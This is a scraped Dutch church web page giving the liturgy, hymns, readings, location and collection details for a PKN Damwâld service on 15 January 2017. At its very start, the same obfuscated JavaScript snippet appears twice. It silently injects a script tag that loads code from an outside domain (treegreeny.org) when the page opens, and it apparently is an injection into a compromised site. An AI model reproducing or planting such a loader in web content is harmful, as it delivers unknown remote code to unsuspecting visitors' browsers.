;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 15 januari 2017 9:30 uur - PKN Damwâld
zondag 15 januari 2017
09:30 uur
Voorbereiding Heilig Avondmaal

Kerkdienst zondag 15 januari 2017 9:30 uur

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Jaap van der Horm
Mededeling:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst ELB 209: 1, 2 en 3
Welkom en mededelingen
Intochtslied Psalm 89: 1 en 9
Stil gebed, bemoediging en groet .
We zingen: ELB 381: 1, 2 en 3
Lezing van het avondmaalsformulier
We zingen: Psalm 65: 1 en 2
Gebed .
We lezen: Mattheus 3: 1-17
We zingen: Gezang 126: 1, 2 en 3
Verkondiging “Goed voorbereiding = het halve werk”
We zingen: ELB 241: 1, 2 en 3
Dankgebed en voorbeden .
Collecte
Slotlied Gezang 166: 2 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Lichtpunt Kollumerzwaag

Het Lichtpunt in Kollumerzwaag is een stichting die vanuit Christelijke levensovertuiging hulp biedt aan mensen die dat nodig hebben. Zonder subsidie van de overheid, gesteund door verschillende kerken, wordt deze hulp aangeboden door beroepskrachten en vele vrijwilligers. Het Lichtpunt heeft veel te bieden, namelijk opvang, begeleiding, dagbesteding in eigen kaarsenmakerij en ontmoeting.

Tweede collecte: Kerk
Uitganscollecte: Kerk